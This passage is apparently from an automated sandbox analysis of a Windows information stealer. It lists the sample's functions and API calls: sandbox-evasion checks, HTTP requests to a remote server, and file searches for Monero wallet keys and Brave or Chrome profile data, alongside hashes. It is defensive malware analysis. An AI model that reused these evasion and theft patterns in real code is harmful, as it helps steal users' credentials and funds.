                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                      • Instruction ID: 7f514b6d827b27c4ef4e35ce086dbf0955f25cf08fa387ffc761687a3b59f8c0
                      • Opcode Fuzzy Hash: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                      • Instruction Fuzzy Hash: 69717E71A40218ABEF24DFA0CC99BEE7B74FB44705F108199F5096B190DBB46A89CF52

                      Control-flow Graph
                      (graph of the function at 00555510; rendering omitted, legend: Executed / Not Executed; the API calls on its paths are listed under APIs below)
                      APIs
                        • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                        • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005556A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555857
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 005552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                        • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 0055532F
                        • Part of subcall function 005552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                        • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 00555383
                        • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 005553AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0055578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555A0C
                      • Sleep.KERNEL32(0000EA60), ref: 00555A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                      • Instruction ID: 5a177d458226dcc38ccf78542989660d096b988be3e639be12728353077dd10b
                      • Opcode Fuzzy Hash: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                      • Instruction Fuzzy Hash: 2DE16471910505AADB04FBB0DC7ADED7B38BF94301F50822AB90756491FF346A4DCBA6

                      Control-flow Graph
                      (graph of the function at 005517A0; rendering omitted, legend: Executed / Not Executed; the API calls on its paths are listed under APIs below)
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 005517C5
                      • ExitProcess.KERNEL32 ref: 005517D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 63e27d10e2f6ea0595d396624f19bbfacaaea02ba4560fa261432533537dc8bc
                      • Instruction ID: 9718d430643462fc169efdcf7e45ef393aae361b98d3e65a5e26ff3b68ad1b62
                      • Opcode Fuzzy Hash: 63e27d10e2f6ea0595d396624f19bbfacaaea02ba4560fa261432533537dc8bc
                      • Instruction Fuzzy Hash: A75180B4A00209EFDB04DFA0D964BBE7FB5BF44705F10854EE906A7280D774E949CB66

                      Control-flow Graph
                      (graph of the function at 00557500; rendering omitted, legend: Executed / Not Executed; the API calls on its paths are listed under APIs below)
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00557542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0055757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0055760A
                      • wsprintfA.USER32 ref: 00557640
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$V
                      • API String ID: 1544550907-271220574
                      • Opcode ID: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                      • Instruction ID: 871dd97918fa2740fbfea29058f5f3ac6086560c7843153b6e4e508ef4be1c59
                      • Opcode Fuzzy Hash: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                      • Instruction Fuzzy Hash: CA4194B1D04248ABDF10DF94DC59BEEBBB8FF48701F10419AF90567280E7786A48CBA5

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021680), ref: 005598A1
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021710), ref: 005598BA
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021698), ref: 005598D2
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021770), ref: 005598EA
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021788), ref: 00559903
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01028928), ref: 0055991B
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,010154E8), ref: 00559933
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01015448), ref: 0055994C
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,010217A0), ref: 00559964
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021518), ref: 0055997C
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,010216B0), ref: 00559995
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021530), ref: 005599AD
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,010156C8), ref: 005599C5
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021548), ref: 005599DE
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 005411D0: ExitProcess.KERNEL32 ref: 00541211
                        • Part of subcall function 00541160: GetSystemInfo.KERNEL32(?), ref: 0054116A
                        • Part of subcall function 00541160: ExitProcess.KERNEL32 ref: 0054117E
                        • Part of subcall function 00541110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                        • Part of subcall function 00541110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                        • Part of subcall function 00541110: ExitProcess.KERNEL32 ref: 00541143
                        • Part of subcall function 00541220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                        • Part of subcall function 00541220: ExitProcess.KERNEL32 ref: 00541294
                        • Part of subcall function 00556770: GetUserDefaultLangID.KERNEL32 ref: 00556774
                        • Part of subcall function 00541190: ExitProcess.KERNEL32 ref: 005411C6
                        • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                        • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                        • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                        • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                        • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                        • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010289A8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                      • Sleep.KERNEL32(00001770), ref: 00556B04
                      • CloseHandle.KERNEL32(?,00000000,?,010289A8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                      • ExitProcess.KERNEL32 ref: 00556B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2931873225-0
                      • Opcode ID: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                      • Instruction ID: 6497a6133172337643a503fd40492882b901ac90d3a50e916afcc4b435b2b13e
                      • Opcode Fuzzy Hash: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                      • Instruction Fuzzy Hash: EE31527094010AAADB04F7F0DC6EBEE7F78BF84342F50461AF902A2181EF746509C7A6

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1436 556af3 1437 556b0a 1436->1437 1439 556b0c-556b22 call 556920 call 555b10 CloseHandle ExitProcess 1437->1439 1440 556aba-556ad7 call 55aad0 OpenEventA 1437->1440 1446 556af5-556b04 CloseHandle Sleep 1440->1446 1447 556ad9-556af1 call 55aad0 CreateEventA 1440->1447 1446->1437 1447->1439
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010289A8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                      • Sleep.KERNEL32(00001770), ref: 00556B04
                      • CloseHandle.KERNEL32(?,00000000,?,010289A8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                      • ExitProcess.KERNEL32 ref: 00556B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                      • Instruction ID: 6832f25de47d9b0ab20a7ceae4a5ab06024d8dad58e542e5f6e24febdfe2fbd0
                      • Opcode Fuzzy Hash: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                      • Instruction Fuzzy Hash: 4FF0307094024AAAF700ABA0DC2AB7D7E74FB04712F608917BD03A2191DBB46548D656

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: c582de9b009d3167ab7939fbbd8bbcac915e63cee8c6b95bb586f2ec73d1770d
                      • Instruction ID: 6b4b391496653c88bed395f59087187a6c9f4c7a761e2d822e1322edbde6a550
                      • Opcode Fuzzy Hash: c582de9b009d3167ab7939fbbd8bbcac915e63cee8c6b95bb586f2ec73d1770d
                      • Instruction Fuzzy Hash: 8D211DB1D00209ABDF14DFA4E849ADE7B75FB45321F108626F925A72D0EB706A09CF91

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                        • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0102FC80), ref: 00546303
                        • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                        • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0102F320,00000000,00000000,00400100,00000000), ref: 00546385
                        • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                        • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                      • Instruction ID: e6d16ada3ff708b3ce11cb7c9bdf117ce77cad8381cca31ccfdf90c49b6b87bf
                      • Opcode Fuzzy Hash: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                      • Instruction Fuzzy Hash: 03111F30910449A7CB14FF70DD6AAED7B38BF90301F408655FC1A46592EF306B09CB91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1493 541220-541247 call 5589b0 GlobalMemoryStatusEx 1496 541273-54127a 1493->1496 1497 541249-541271 call 55da00 * 2 1493->1497 1498 541281-541285 1496->1498 1497->1498 1501 541287 1498->1501 1502 54129a-54129d 1498->1502 1504 541292-541294 ExitProcess 1501->1504 1505 541289-541290 1501->1505 1505->1502 1505->1504
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                      • ExitProcess.KERNEL32 ref: 00541294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 803317263-2766056989
                      • Opcode ID: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                      • Instruction ID: 0dbb06116785e83c430c4a204ab77aa88386feadc157b5320cfcc0780325ca52
                      • Opcode Fuzzy Hash: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                      • Instruction Fuzzy Hash: 20014FB0948308BAEB10DBD0CC49B9EBB78BB44705F208055E705F6180D7B46585875D
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                      • Instruction ID: af00ef862b9f4821313cfb74156a62dc8a62f7e4c2d6f27e3e4e0d1f47adc1bf
                      • Opcode Fuzzy Hash: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                      • Instruction Fuzzy Hash: 9D0162B1944208EBDB10DF94DD45FAAFBB8F704B21F10421AEA45E3280C37859048BB5
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                      • ExitProcess.KERNEL32 ref: 00541143
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                      • Instruction ID: f3aa8f6f6cf297fe64ee3c59b72add0a5333aaa336e3f832f5311aad4c58ff13
                      • Opcode Fuzzy Hash: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                      • Instruction Fuzzy Hash: 30E0E670985308FBF710ABA19C0EB497A78AB04B45F204055F709761D0D6B92640979E
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005410B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005410F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                      • Instruction ID: ad979e7d54e63171e9091120d29bd7897c341c9a54eab0ca3def99d3140d439e
                      • Opcode Fuzzy Hash: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                      • Instruction Fuzzy Hash: 5AF0E271681208BBE7149AA4AC5DFBABBE8E705B15F304449F904E3280D5719F40DBA8
                      APIs
                        • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                        • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                        • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                        • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                        • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                        • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                      • ExitProcess.KERNEL32 ref: 005411C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                      • Instruction ID: b55363fb87426da481e92bb1159e7fbf36ff10ec0fb6d647fcb5b2724e286043
                      • Opcode Fuzzy Hash: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                      • Instruction Fuzzy Hash: 9CE0ECB595420663DA0073B0BC1EB2A3A9C7B5434AF144426BE0592502FE29E854866E
                      APIs
                      • wsprintfA.USER32 ref: 005538CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 005538E3
                      • lstrcat.KERNEL32(?,?), ref: 00553935
                      • StrCmpCA.SHLWAPI(?,00560F70), ref: 00553947
                      • StrCmpCA.SHLWAPI(?,00560F74), ref: 0055395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00553C67
                      • FindClose.KERNEL32(000000FF), ref: 00553C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                      • Instruction ID: ee6726cd8cc635dd126b556541277f79f90b32a300dd20c78184e5c2eacc45f4
                      • Opcode Fuzzy Hash: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                      • Instruction Fuzzy Hash: CDA154B1A40209ABDB24DF64DC99FFE7778BF84301F048589B90D96141EB759B88CF62
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00560B32,00560B2B,00000000,?,?,?,005613F4,00560B2A), ref: 0054BEF5
                      • StrCmpCA.SHLWAPI(?,005613F8), ref: 0054BF4D
                      • StrCmpCA.SHLWAPI(?,005613FC), ref: 0054BF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054C7BF
                      • FindClose.KERNEL32(000000FF), ref: 0054C7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                      • Instruction ID: a376b533160e8361919a632a0eec6438eb9fd25761e526e0633f112b21ee6eaa
                      • Opcode Fuzzy Hash: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                      • Instruction Fuzzy Hash: 74425572910105ABDB14FB70DD6AEED7B3CBBC4301F408659B90697191EE34AB4DCB92
                      APIs
                      • wsprintfA.USER32 ref: 0055492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00554943
                      • StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                      • StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                      • FindClose.KERNEL32(000000FF), ref: 00554B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                      • Instruction ID: 25c70a7144cb8ea6f54f23c9828e767d37f53b59e1e27ec353f2f192a2948708
                      • Opcode Fuzzy Hash: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                      • Instruction Fuzzy Hash: 4A6188B1900219BBDB20EFA0DC59FEA777CBB48701F048589F50996140EB74EB89CFA5
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                      • wsprintfA.USER32 ref: 005545A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                      • StrCmpCA.SHLWAPI(?,00560FC4), ref: 005545EB
                      • StrCmpCA.SHLWAPI(?,00560FC8), ref: 00554601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0055468B
                      • FindClose.KERNEL32(000000FF), ref: 005546A0
                      • lstrcat.KERNEL32(?,0102FC10), ref: 005546C5
                      • lstrcat.KERNEL32(?,0102E508), ref: 005546D8
                      • lstrlen.KERNEL32(?), ref: 005546E5
                      • lstrlen.KERNEL32(?), ref: 005546F6
                      Strings
                      Memory Dump Source
